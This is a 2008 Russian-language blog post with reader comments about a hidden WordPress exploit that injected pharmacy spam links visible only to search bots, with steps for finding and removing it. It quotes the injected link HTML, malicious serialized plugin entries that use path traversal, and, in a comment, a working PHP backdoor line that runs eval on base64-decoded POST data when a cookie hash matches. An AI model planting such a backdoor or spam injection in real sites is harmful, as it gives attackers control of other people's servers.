wp_footer exploit, владельцам блогов на WordPress

1 June, 2008

wordpress, Общие, Полезности

Мой блог стал пропадать из гугла, причиной оказался практически незаметный эксплойт для WordPress. О том как узнать о нем, и избавиться от него, этот пост.

Чтобы узнать об этих граблях мне пришлось наступить на них. Это было больно, половина страниц моего блога ушла из индекса гугла. Надеюсь с вами этого не случится.

Что вообще происходит?

После определенных действий (о них ниже) на вашем блоге появляются рекламные ссылки на другой ресурс.
Однако видят их только поисковые боты. При обычном просмотре страничек вы не увидите их следа.

Я заметил их случайно, просматривая HTML закешированной главной странички моего блога, вот скриншот кода (внизу странички, после футера, очень много ссылок):

скриншот спамаКуча спама в коде cssing’a

Или вот кусочек кода, чтобы было видно:

<div id="_wp_footer"><a href="http://www.articulate.com/blog/?page=0" title="Acyclovir">Acyclovir</a>
<a href="http://www.articulate.com/blog/?page=1" title="Adderall">Adderall</a>
<a href="http://www.articulate.com/blog/?page=2" title="Adipex">Adipex</a>
<a href="http://www.articulate.com/blog/?page=3" title="Alprazolam">Alprazolam</a>
<a href="http://www.articulate.com/blog/?page=4" title="Ambien">Ambien</a>
...  и еще около 100 ссылок ...

Ссылки, конечно, могут быть и другие, но их будет очень много, и заметить их будет легко.

Обнаружить у себя этот спам очень просто:

  1. Вводим в google адрес своего блога
  2. Жмем на “cached” или “сохраненная копия”
  3. В своём броузере нажимаем “View Source” (просмотр исходного кода, или HTML-кода)
  4. В самом низу кода ищем огромный список левых ссылок (как показано выше на скриншоте, и в виде текста). Ссылки могут быть другие, но понять ваши они или нет, вы сможете легко.

Либо прописываем в фаерфоксе вместо User Agent – “Googlebot/2.1 (+http://www.googlebot.com/bot.html)”. Типа для продвинутых.

Cсылки вставляются с помощью функции wp_footer(). Потому для быстрого исправления, достаточно ее закомментировать в footer.php. (она редко кем используется)

Как это всё убрать

Так как у эксплойта есть несколько лазеек, нужно пробовать пока не получится.
Вот варианты:

1. Проверить .htaccess

В .htaccess возможны подозрительные редиректы. Обычно этот файл довольно маленький и без ссылок.

2. Проверить файлы внутри вашей темы

Проверить папку wp-content/wp-theme/YOUR_THEME/ на предмет подозрительных файлов. Например в некоторых случаях там появляется файл index2.php. Или еще что-то необычное.

3. Проверить папку wp-includes/

Искать нужно файл class-mail.php, если найдете:
compat.php — (необходимо заменить на корректный с wordpress.org)
class-mail.php — удалить.

4. Проверить файл wp-includes/default_filters.php

В файле default_filters.php поищите такую строку:

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');

Или похожие на нее. Они же могут вобщем-то быть в любых файлах.

5. Таблица wp_options

В базе данных следует обратить внимание на строку в таблице wp_options, где option_name=active_plugins. Там, в поле option_value вероятно могут находиться ссылки на вызываемый код, например так:

i:1;s:117:"../../../../../../../../../../../../../../../../../../../../../../tmp/tmpzv0zq2/sess_12d33bbd6fb1b4f67df11f089be43b20";

i:2;s:45:"../../wp-content/themes/cssing2/index_old.gif";

Не может не вызвать подозрения, неправда ли?
Обычно там что-то вроде этого:

i:6;s:25:"subscribe-to-comments.php";

Если у вас обнаружились похожие подозрительные значения в базе, скорее всего такой запрос вернет вам остатки эксплойта:

SELECT option_value FROM wp_options WHERE option_name = 'internal_links_cache'

Непосредственно в этом поле, у меня хранились ссылки выводимые поисковикам закодированные base64.

6. Проверить файлы *_new.giff *_old.pngg *_new.php, *_old.gif

В некоторых директориях инсталляции WordPress могут появится файлы вроде index_old.gif, index_old.giff, whatever_new.php. И тому подобные. Их нужно обязательно удалить.
Файлы могут быть во всех директориях:
/wp-content/uploads
/wp-content/plugins
/wp-content/themes
/wp-includes
/wp-admins
/

7. Поиск ‘base64’ в тексте

В идеале лучше сделать поиск по всем файлам Вордпресса таких строк:
base64 (рядом с кучей непонятных символов) — рядом должно быть что-то вроде eval….
_wp_footer_ (в нормальном WordPress не найдётся)
(или кусочки HTML, который выводит у вас СПАМ-ссылки)

Эти кусочки кода могут оказаться в почти любом файле WordPress.

Каково! Куча вариантов на выбор, как вставить вам спам! Вот где смекалка сегодня работает!

Интересно так же, что все методы позволяют вам апгрейдить WordPress. Обновляйте его хоть каждый день, если эксплойт прописан, он останется. Умные спаммеры.

Полезные ссылки

Без информации из этих ссылок, я бы просто не справился с атакой за 2 часа.

У меня оказалось следующее:

  1. wp-content/wp-theme/cssing/index_old.gif
  2. Записи в таблице wp_options, в полях описанных выше.

P.S.: Об истоках:

I also found a signature name alxumuk

Все дорожки ведут к славянам…
На блоге Альберта Гора, кстати тоже был этот вид спама, один в один как на cssing. =).

Обновляйте wordpress почаще, и посматривайте не подцепили ли вы что-то вроде этого… Эксплойту, уверен, подвержено не так много сайтов, но лучше провериться.
Опыт, мысли, советы — приветствуются!

wordpress, Общие, Полезности

106 комментариев к “wp_footer exploit, владельцам блогов на WordPress”

Slaver | 1. 1 June, 2008

Хаха, красотища какая! :)

Dmytro Shteflyuk | 2. 1 June, 2008

По поводу последнего совета. Вот такая строчка обнаружилась у меня в куче php-файлов. Жуть!

<?php if(md5($_COOKIE[‘_wp_debugger’])==”92f0a7a5d33e5ccd708ec26d4225139d”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

Ну и wp_options тоже есть…

akella | 3. 1 June, 2008

Да, у тебя там похоже даже в двух экземплярах эксплойт на блоге :).
Так что нужно все подчистить

Код удобный. Две строки и можно исполнять любой PHP на чужом сервере.

Значит я все это описывал не зря =) Пост окупился.

Cooluck | 4. 1 June, 2008

Советую против уязвимостей маленький плагин php-md5, который показывает в админке вносились ли изменения в файлы WP.

akella | 5. 1 June, 2008

Спасибо! Отличный плагин!
Но в данном случае он бы не помог, ибо изменения в файлы не вносилишь, лишь добавился новый неВордпресс файл и запись в базе..

Cooluck | 6. 1 June, 2008

Коль пошла такая пьянка – минимальную проверку безопасности поможет выполнить плагин WP Security Scan http://semperfiwebdesign.com/plugins/wp-security-scan/

P.S. И спрятал бы ты версию блога из комментариев и meta generator. От уязвимостей необязательно спасёт, но редискам жизнь подпортит.

Большой Лис | 7. 1 June, 2008

Владельцам WordPress можно посоветовать только… Слезать нафиг с этого решета, зверски стирать его с винтов хостинга, и не юзать больше никогда.
;)

ganges | 8. 2 June, 2008

Боьшое спасибо, akella, сегодня ты как хороший доктор.

@Большой Лис
Wordpress не решето. Всякое бывает. Рано или поздно. С любой раскрученной софтиной. Или вы что-то лучшее предлагаете? Типа не дырявое ;-)

Jevge | 9. 2 June, 2008

Как поймал экспойт?

akella | 10. 2 June, 2008

ну вот =) уже два блога излечились! Супер.

@ Jevge: пока два варианта, либо мой запоздалый апдейт с 2.5 до 2.5.1 либо откуда-то слитые ФТП-доступы. Я слышал, на нескольких западных хостингах этот эксплойт продвинулся именно через украденные базы хостера с ФТП-аккаунтами клиентов.

В метаданных поставил себе версию wordpress 4.5. Пускай хакеры думают теперь :)
Вот жил же ж 2 года на wordpress 1.5, никакие эксплойты ее не брали :)

Dmytro Shteflyuk | 11. 2 June, 2008

Аналогично, несколько лет ни “единого разрыва”… Так что не думаю, что это повод съезжать.

Dimox | 12. 2 June, 2008

Юра, а посмотри-ка еще раз внимательно все мета-теги страницы. Хоть ты и заменил версию на 4.5, какой-то другой плагин все равно выдает настоящую версию, дублируя “generator”.

Рекомендую ознакомиться с моей статьей, там есть список очень полезных плагинов в плане безопасности.

akella | 13. 2 June, 2008

Спасибо за полезный линк!
Но похоже спаммеры в курсе всех этих плагинов, насколько я понимаю, им (плагинам) не удалось бы обнаружить эту атаку. Все файлы остались неизменными, изменилась лишь база и тема…

Да и вообще я по жизни не люблю антивирусы и прочее :) Хотя и понимаю что иногда это чревато)

Dimox | 14. 2 June, 2008

ИМХО, лучше использовать хоть что-то, чем совсем ничего. На 100% все равно никто не защищен.

Плюс значит нельзя сохранять пароли в программах, используемых для ФТП-доступа, раз ФТП тоже попал под подозрение.

Есть почитать что » eat art | 15. 2 June, 2008

[…] Юзерам WP полезно почитать о ссылочном спаме в вашем блоге и о том, как этого избежать.. […]

Павел Власов | 16. 2 June, 2008

А как вообще враг пролез на хостинг?! Самое интересное, и не освещено…

akella | 17. 2 June, 2008

Наиболее вероятно – незадокументированная и неизвестная дыра в WordPress 2.5. Найти ее на данный момент очень сложно, учитывая что доступа к логам у меня сейчас нет.

Dmytro Shteflyuk | 18. 2 June, 2008

Судя по тому, что “плагин” ложится в /tmp/sess*, они каким-то образом суют код в сессию. А вот как оно попадает список активированных плагинов, а главное, какого лешего вордпрессовцы делают include записи в базе, не проверяя, что они включают – это загадка. У себя уже влепил проверку, что плагин лежит в каталоге плагинов, но до сих пор пребываю в шоке…

uggallery | 19. 2 June, 2008

У меня был тот же эксплойт. По-другому проявлял себя. Обеспечил неделю веселого досуга :) Пришлось перелезать с 1.5 на последнюю версию.

Айди Контент » Blog Archive » Must read владельцам Wordpress | 20. 2 June, 2008

[…] читаем статью на сайте Юрия […]

ganges | 21. 2 June, 2008

Эксплойт есть :( Пошагово проверил все, о чем написано в этой статье – все чисто, и это еще хуже. Насчет “дыры” в 2.5 – скорее всего дыра была и в более ранних версиях, потому что у меня более ранняя.

Решит ли проблему апгрейд до 2.5.1?

akella | 22. 2 June, 2008

Даже в базе нет ничего? В wp_options?
В таком случае у тебя совершенно точно должен был появится левый файл где-то в папках wordpress. Нужно проверить по датам, у всех должны быть одинаковые, а у него будет отличаться. В папке темы все файлы просмотрел?

Вероника | 23. 2 June, 2008

Мда, xss убили, но тут еще одна бяка вылезла, сейчас шустро проверила свой сайт на ВП, у меня все чисто, пока что не зацепило. Но страничку занеслав избранное, мало ли что случится, спасибо!

Vladson | 24. 2 June, 2008

Защититься на 100% от этого не возможно, вовремя обновляйтесь и не ставьте “левых” плагинов (из неизвестных источников) это поможет хотя бы немного…

Dmytro Shteflyuk надо было посмотреть дату модификации файлов, а потом прошерстить логи на предмет необычных записей (XSS или инъекций) это могло бы пролить свет на то как они туда попали, а в последствии и заделки дыры, а если просто удалить эти строки то их потом зальют снова и всё…

Vladimir | 25. 2 June, 2008

Так это все темы. Ради этого и делается тысячи бесплатных тем, я всегда вырезал все такое Г сразу же как только оставлял какую либо тему. Это есть почти во всех фри темах.

ganges | 26. 2 June, 2008

@Vladimir
Очень похоже на мою ситуацию

sonika | 27. 2 June, 2008

Афигеть, и не догадаешься, если случайно не наткнешься на такое!
Кстати о безопасности, для того, чтобы спокойно спать я на все ВП обязательно ставлю 3 плагина:
anti xss attak
http://mywordpress.ru/plugins/belavir/
и новенький http://blog.portal.kharkov.ua/2008/05/21/iodized_salt/

Vladson | 28. 2 June, 2008

>>> для того, чтобы спокойно спать
Для этого надо ничего не делать, и не иметь ни сайта ни даже домашнего компьютера (если есть сайт и есть финансово заинтересованные во взломе стороны то его ломанут не смотря ни на что)

sonika | 29. 2 June, 2008

Для этого надо ничего не делать, и не иметь ни сайта ни даже домашнего компьютера

Vladson, понятно, что кругом враги, но размышляя таким образом, можно сразу собираться умирать — жить тоже опасно :) Уж лучше перебдеть, чем недобдеть.

Vladson | 30. 3 June, 2008

Просто доверять всяким анти-XSS я бы не стал (наоборот я им не доверяю) уж лучше просто своевременно обновляться, или если уж действительно нужна безопасность то нанять опытного специалиста на обслуживание сайта.

wp_footer exploit, владельцам блогов на Wordpress : Блог Молчуна | 31. 3 June, 2008

[…] Я заметил их случайно, просматривая HTML закешированной главной странички моего блога, вот скриншот кода (внизу странички, после футера, очень много ссылок) Дальше […]

Lyncis | 32. 3 June, 2008

По моему опыту, очень часто иньекции бывают от неправильной расстановки прав доступа. А эта самая неправильная расстановка часто бывает от заливания файлов по FTP на хостинг из Windows, которая в этих самых правах доступа не сильна.

xarch | 33. 5 June, 2008

Ай, да спамеры, ай да сукины дети :)) Это же надо так замаскироваться. Класс.
Автору благодарность за описание сплоита.

Доктор в сети | 34. 6 June, 2008

Да спамеры они такие! Молодец автор, респект пожизнено.

sed | 35. 7 June, 2008

По идее нет ничего неломаемого, это уже не спамерство, это взлом, почти наказуемое дело, если найдешь кто это сделал. Но жадность непонятна, ведь достаточно одно ссылки, а тут около сотни, была бы одна – автор бы не заметил ее совсем.

ganges | 36. 7 June, 2008

Кстати, да. Как минимум в Украине, несанкционированное внесение изменений в код, находящийся в чужой частной сети – уголовно наказуемое деяние, статья №361, часть вторая, от 3 до 6 лет
http://www.crime.org.ua/osobliva/16/

Vladson | 37. 8 June, 2008

В России тоже наказуемо, и в Эстонии тоже (вообще скорее всего везде) просто найти нарушителя нереально (найти его обязаны менты, а они этим заниматься не будут, ибо лень…)

Вирусное СЕО | 38. 8 June, 2008

Полезнейший пост!
Не придавал этому ранее значения. У меня с футером пока что всё в норме :)
Как только представил СКОЛЬКО различных возможностей “подмены” футеры существует в ворпрессе и уследишь за всеми ведь…
Хорошая инфа, будем думать.

Денис | 39. 9 June, 2008

Любопытно! У меня такого не было…
Я кстати так и не понял из-за чего!?

Max | 40. 10 June, 2008

“В России тоже наказуемо, и в Эстонии тоже (вообще скорее всего везде) просто найти нарушителя нереально (найти его обязаны менты, а они этим заниматься не будут, ибо лень…)”

Ну почемуже вы так говорите ? вы обращались ?

Vladson | 41. 10 June, 2008

/Ну почемуже вы так говорите ? вы обращались ?/
1 – говорю так потому что меня пытались подставить (все видимые факты указывали на меня)
2 – не обращался (за это должны были вообще сразу посадить, укрывательство тоже уголовно наказуемо)

Vladson | 42. 10 June, 2008

/укрывательство/
Правда тут ещё надо доказать знал ли я что вообще происходит, но если бы менты хотя бы начали разбираться я бы как минимум до суда просидел в кутузке…

/в Украине … статья №361/
В России 272 (или 273 точно не помню), а в Эстонии не знаю, но знаю что такая статья есть
Знаю точно одно, никто этим заниматься не будет (просто потому что лень)

Цветовод-декоратор | 43. 11 June, 2008

Век живи, век учись:)).
просмотрел подвал своего блога – бякинет! Хоть это радует.

Безопасность! wp_footer exploit, владельцам блогов на Wordpress | WP лента | 44. 15 June, 2008

[…] Источник […]

Vladimir | 45. 15 June, 2008

Akella, не поможет мало-мальски опытному взломщику изменение метеданных о версии блога. Простой пример. Зайдите на страницу wp-login.php, просмотрите код. Там будет нечто вида /wp-admin/css/login.css?version=2.5

Или: wp-includes/js/tinymce/tiny_mce.js; там видно, что версия TinyMCE – 3.06, что соответствует WP 2.5+.

По поводу безопасности: не используйте FTP, SSH гораздо безопаснее. Если вы не планируете менять файл, ставьте ему атрибуты 0444 – чтобы всякая гадость себя туда не писала (хоть WP и говорит, что всё внутри wp-content должно быть записываемо, это потенциальная дыра). Надо обновить плагин – закачайте ручками, не используйте автообновление.

Удобство и безопасность – два разных полюса :)

Обновляйте его хоть каждый день, если эксплойт прописан, он останется. Умные спаммеры.

Всё проще – WordPress не свои темы не обновляет.

Как минимум в Украине, несанкционированное внесение изменений в код, находящийся в чужой частной сети – уголовно наказуемое деяние, статья №361, часть вторая, от 3 до 6 лет

Господа юристы, это всё в теории. На практике это очень трудно доказать.

Vladimir | 46. 16 June, 2008

Akella, такой вопрос: вы могли подхватить заразу, сидя на WP 2.3? Если да, то я знаю, как она пришла.

akella | 47. 16 June, 2008

Всё проще – WordPress не свои темы не обновляет.

Не совсем так, просто эксплойт хранился в базе, и в отдельном файле. При обновлении версий вордпресса база не изменяется, как и невордпресс файлы. Ну и конечно темы тоже.

У меня не стояло 2.3. Но узнать было бы конечно интересно! Из старых у меня стояли только 1.5 и 2.5.

Vladimir | 48. 17 June, 2008

У меня не стояло 2.3.

2.5 я на уязвимости не исследовал, ничего сказать не могу… А в ветке 2.3 существовали уязвимости, благодаря которым можно получить доступ в админку сайта (необходимые данные воруются при помощи пары атак с SQL injection, после чего в два запроса подделываются авторизационные cookie). Если тема доступна на запись Вордпрессу, туда можно напихать всякие гадости.

Я слышал краем уха про какую-то жуткую дыру в 2.5 (которую в 2.5.1 поправили), но не было времени проверять.

bner4832 | 49. 18 June, 2008

Очень интересно хочется узнать об этом побольше.

Александр | 50. 28 June, 2008

Ого, понапугали меня, недавно начал с вордпрессом работать, а тут такая информация вылазиет, сейчас на все файлы темы вордпресса права поменяю, ссылки это фигня, но еще нехватало чтобы еще и пароль от админки сперли.Спасибо за предостережение!

Lifehacker » Архив » Интересное в блогосфере | 51. 4 July, 2008

[…] Владельцев блогов на движке WordPress заинтересует статья об оптимизации поискового веса вашего блога, который может быть существенно подорван генерированием невидимых ссылок эксплоитом в БД. wp_footer exploit. […]

Михаил | 52. 4 July, 2008

Рекомендую поставить плагин Anri-XSS он поможет в большинстве случаев :).
Основной дырой является то, что админ авторизован в своем блоге и вход не требует логина/пароля, следовательно можно делать все что хочешь.

@Большой Лис.
Даже правильно сконфигурированный Windows может эффективно закрыть свои дыры :)

Vladimir | 53. 4 July, 2008

Михаил, то, что делает AntiXSS, WordPress еще умеет с версии 2.0.3. Тем более, что плагин борется не с XSS, а с CSRF, что, в принципе, довольно-таки разные вещи :-)

А возможность XSS-атак “произростает”, в основном, из всяких дыр в темах и сторонних плагинах.

По поводу “основной дыры” могу лишь посоветовать прочитать про nonce и ее реализацию в WordPress. Или могу предложить спор ($500 пойдет?): я не буду выходить из админки блога, а Вы попробуете “состряпать” запрос, который создаст пользователя с админскими правами.

wp_footer exploit | 54. 5 July, 2008

[…] исправления, достаточно ее закомментировать в footer.php. cssing :: Архив :: wp_footer exploit, владельцам блогов на WordPress WordPress 2.3.3 […]

unodj | 55. 5 July, 2008

Dimox, Akella
вот это:
прописывает в head шаблонов сам WordPress с помощью ф-ции wp_head для которой нет фильтров.
Теперь строку “leave this for stats” так просто из шаблона не вырежешь и не поменяешь :)

unodj | 56. 5 July, 2008

Прикольно в комментариях спампарампампам спамится :D

sloger.net | 57. 6 July, 2008

wp_footer exploit, владельцам блогов на WordPress…

wp_footer exploit, владельцам блогов на WordPress

Мой блог стал пропадать из гугла, причиной оказался практически незаметный эксплойт для WordPress. О том как узнать о нем, и избавиться от него, этот пост.
Чтобы узнать об этих граблях мне пришлось нас…

Ruslan | 58. 6 July, 2008

fixed, огромный респект тебе чувак.

Сергей Шинкарев | 59. 7 July, 2008

Коллеги, а как расшифровать эту шнягу? У меня в футере этим кодом закрыты четыре ссылки автора. Мне сами ссылки по барабану, но шифровка не нравится. В Пыхе не силён. Помогите советом или ссылочкой. Спасибо.

Vladimir | 60. 7 July, 2008

Сергей, если Вы запостите шифровку, могу помочь. Или мылом на vladimir at sjinks dot org dot ua.

PS – а ссылки всё равно лучше убрать :-)

Сергей Шинкарев | 61. 7 July, 2008

http://webcontext.ru/wp-content/uploads/2008/07/footer.rar
Футер именно этого сайта. Ссылку одну оставлю. Автор у темы должен быть (хотя намучался я с локализацией …). Одну оставлю на Автора, другую на Вас.

Vladimir | 62. 7 July, 2008

Ппц, а не футер… 70 раз gzdeflate/base64_encode… И все ради четырёх ссылок в футере. Автор мазохист. Причем зашифрован был HTML, а не PHP.

http://download.sjinks.org.ua:8080/footer.txt – код, получившийся после расшифровки.

Сергей, если хотите сослаться на меня – большое спасибо, но если можно, то ссылайтесь, пожалуйста, на статью, посвященную расшифрованию футеров (она еще не готова, но скоро будет) – думаю, от такой ссылки будет больше пользы :-)

Сергей Шинкарев | 63. 7 July, 2008

Не ожидал такой оперативности, да ещё и среди ночи. С пхп-скобками отказался работать. Я их убрал – всё встало на свои места. Благодарю.
Только сейчас дошло: если бы я просто поставил в пару “див” какой-то текст, футер что – отказался бы появляться? Там именно четыре пустых контейнера должны стоять сначала?

Vladimir | 64. 7 July, 2008

:-) Если программист в 9 утра на работе, это значит, что он еще не ушел.

Текст, который я привел – это результат работы того дикого кода в архиве. Если был нужен только HTML, то скобки, действительно, нужно было убрать.

Про четыре пустых контейнера не совсем понял. Зашифрованый PHP-код их сам выводит. То есть для того, чтобы в них что-то вставить, Вам бы пришлось сначала расшифровать файл. А футер появляется потому, что в файлах темы есть строка вида <?php get_footer(); ?>, которая и подключает файл footer.php. Если Вы ее уберете, то и футера не будет.

ВордПресс: чистка футера | ВордПресс по русски | 65. 8 July, 2008

[…] Дейла, которые приходят людям на помощь: сначала нашли обсуждение темы “эксплойт в ВордПресс”, затем в этой теме […]

Доска почёта | ВЕБ ? ОНТЕ? СТ >>> | 66. 11 July, 2008

[…] блогам двух специалистов по ВордПресс: CSSing и Ars Longa Vita Brevis. Благодаря их профессионализму нам […]

Оксана | 67. 11 July, 2008

Хотела сказать Большое Спасибо Автору. Инфорация на самом деле очень ценная, я даже это и не предполагала.

Beware exploit | Блоговодство | 68. 15 July, 2008

[…] Владельцы wordpress’a проверьтесь, говорят существует exploit. […]

Devil | 69. 18 July, 2008

Огромное спасибо автору, в своей теме нашел зашифрованные ссылки, слава богу вовремя убрал :) Ещё раз большое спс))

Flector | 70. 23 July, 2008

так я все-таки не понял – каким образом был подцеплен эксплойт? одно дело дыра в безопасности wordpress и совсем другое украденные базы паролей хостеров.

akella | 71. 23 July, 2008

Думаю дыра в WP, я не обновляю обычно до последних версий движок.

Александр | 72. 28 July, 2008

Недавно, на одном из сайтов на движке WPm нашел кучу ссылок в футере. Удалил ссылки и обновился. Пока тихо.
Но вот варианты с куками и прочее еще не попадалось, но настораживает…

BornInUSSR.ca неформат: то, что не вошло в рассылку » Blog Archive » Продолжение вирусной истории | 73. 13 August, 2008

[…] здесь товарищ рассказывает и показывает. Правда, весь […]

Дмитрий Рассев | 74. 19 August, 2008

По поводу безопасности сказать могу лишь одно: закройте доступ записи в файл. Это сделать просто в файловом менеджере, выставив метку 644.

А кусок кода, зашифрованный с помощью base64 элементарная защита автора шаблона от изменений. Обычно находится в foother.php, где автор ставит ссылки на свои ресурсы.

deco90 | 75. 1 September, 2008

У меня на сайте появилась одна ссылка
причем я ее вижу, но в файлах самого шаблона найти немогу
посмотрел в Таблица : wp_options и вот что нашел
option_name – secret
option_value – f^BWy2I!kzi&6@ltNg4H)RCF)gbtfK)xCzu*K6omBg(NO9tLjV..
Думаете это и есть тот самый эксплойт?

Vladimir | 76. 1 September, 2008

Нет, вряд ли. Особенно, если у Вас WP 2.5.

Посмотрите файл wp-includes/pluggable.php, функцию wp_salt().

По поводу ссылки/эксплойта: проверьте Ваши файлы на наличие строк типа base64_decode, eval, gzinflate.

Сергей Шинкарев | 77. 1 September, 2008

deco90, не следует путать эксплойт с безвредной шифровкой. Чаще всего ссылки шифруют лишь для того, чтобы их не могли удалить обычные юзеры.
Если хотите, можете скинуть мне в почту файл “footer.php”. Или тот, где у Вас появилась ссылка.
shinkareff@ya.ru

deco90 | 78. 1 September, 2008

В том то и дело, что файл в котором появилось я незнаю как вычислить. Разве что index.php, потому что футер я смотрел, он заканчивается и после него код уже появляется. Вот смотрите как получается

фрезерные машины тут

Кому интересно, зайдите на сайт мой и просмотрите код страницы, эта фигня будет в самом низу. И потом скажите какой файл выслать.

deco90 | 79. 1 September, 2008

Блин поставил код и в итоге тока ссылка…

Сергей Шинкарев | 80. 1 September, 2008

Заходить и смотреть нет смысла – запрос уже выполнен и в результате может отображаться всё, что угодно. Два файла тут при делах – футер и, возможно, индекс.

deco90 | 81. 1 September, 2008

отправил на ваш e-mail
тема – “левые ссылки”

Vladimir | 82. 1 September, 2008

А возможно – functions.php :-)

deco90, киньте, пожалуйста, ссылочку на архив Вашей темы, там разберемся

deco90 | 83. 1 September, 2008

blog-invest.ru/DarkZen.rar залил на свой блог, тут вся тема

Vladimir | 84. 1 September, 2008

deco90, в Вашем случае с темой всё в порядке; скорее всего, какой-то плагин гадит.

Да, и закрыли бы Вы http://seo-fx.ru/wp-content/plugins/

Сергей Шинкарев | 85. 1 September, 2008

Подтверждаю выводы Владимира.
Никаким эксплойтом и не пахнет.
Чисто.

deco90 | 86. 2 September, 2008

спасибо за советы, папку плагины закрыл

жека | 87. 16 September, 2008

а у меня не ссылки а ифреймы были прописаны.

Daddy | 88. 26 September, 2008

Вау, спасибо! Информирован, значит защищен.

Driver | 89. 27 September, 2008

У меня подобная херня была на старом вордпрессе, после обновления слава богу тьфу, тьфу, тфу

Tash | 90. 29 September, 2008

Спасибо за информацию, будем иеперь беречься. А еще скажите, в новом вордпрессе эту узвимость закрыли?

сергей | 91. 7 October, 2008

это сплойт из 2.2.2 версии. вообще wp часто ломают с каждой версией все больше и больше. так что не понятно даже обновляться или нет =)

Безопасность WordPress. Взлом блога WordPress 2. : Jonny Internet Business - Мой дневник об интернет заработке. | 92. 13 December, 2008

[…] и нашел замечательную статью по этому поводу, wp_footer exploit, владельцам блогов на WordPress, рекомендую ознакомится с ней и проверить свои блоги. […]

AMBA | 93. 8 January, 2009

Желательно не юзать бесплатные скрипты с открытым кодом, вы сами этим говорите взломщикам – “вот исходники моего сайта, ломай на здоровье”. Такие скрипты полностью обезопасить практически невозможно, поэтому и пенять не на кого. за что боролись, на то и…
На счёт следа с уводом ФТП, врядле. Уводят фтп аки в большинстве своём троянцами, и потом через фтп размножают ифреймы с атакующими скриптами, для заражения новых жертв. Тут же речь о специализированном под конкретный скрипт коде, не связанном с вирусной деятельностью, так что ломали вероятно целенаправленно вп.

idcontent | 94. 8 January, 2009

Желательно не “не юзать бесплатные скрипты”, а юзать бесплатные скрипты из авторитетных источников. Это же касается и ВП тем.

OSS как раз тем и интересно, что всевозможные дырки чаще находятся и быстро закрываются сообществом.

Олег | 95. 8 February, 2009

А какие предложения будут по удалению зашифрованного кода типа base64_decode. Пытаюсь удалить в плагине, пока не получается. Может кот уже сталкивался? Файл не фотер.

Vladimir | 96. 8 February, 2009

Олег, очевидно, его надо расшифровать — делаете руками base64_decode() и т.п.

Если дадите ссылку на зашифрованный файл, могу помочь.

Olesya | 97. 9 February, 2009

А где вы берете эти самые декодеры base64? У меня в шаблоне есть что-то. Хотелось бы увидеть что именно.

Vladimir | 98. 9 February, 2009

Olesya, всё до смешного просто:

<php echo base64_decode(‘encoded text gere’); ?>

ell | 99. 18 March, 2009

подскажите как сделать “footer” редактируемым,или гдн нго наети чтоб отредактировать?

nice | 100. 31 August, 2009

Спасибо за статейку!

@Cooluck спасибо за плагин

Twitter Trackbacks for cssing :: Архив :: wp_footer exploit, владельцам блогов на Wordpress [org.ua] on Topsy.com | 101. 31 August, 2009

[…] cssing :: Архив :: wp_footer exploit, владельцам блогов на WordPress cssing.org.ua/2008/06/01/wp-footer-exploit – view page – cached Блог про CSS и все что с этим связано. Новые приемы и технологии и т д. — From the page […]

Осторожно exploit! Владельцам Wordpress | Web notes | 102. 31 August, 2009

[…] подробно читайте в оригинале, и будьте бдительней! Добавить на Закладки GoogleTweet […]

cssing :: Архив :: wp_footer exploit, владельцам блогов на Wordpress | Squico | 103. 31 August, 2009

[…] In: WordPress plugins 31 Aug 2009 Go to Source […]

Руслан | 104. 25 September, 2009

У меня эксплоит переодически добавляет ссылки прямо в посты, везде искал – нигде не нашел :-( WordPress 2.2.1 Может есть идеи у кого еще?

Траф | 105. 21 November, 2011

Актуальные обновления и только они спасут нас от взломов!
Ну и нафиг всякие левые плагины. Чем больше плагинов и тем старее их версии, тем блог уязвимей!

Филипп | 106. 18 November, 2012

Могу сказать, актуально!)

Оставить комментарий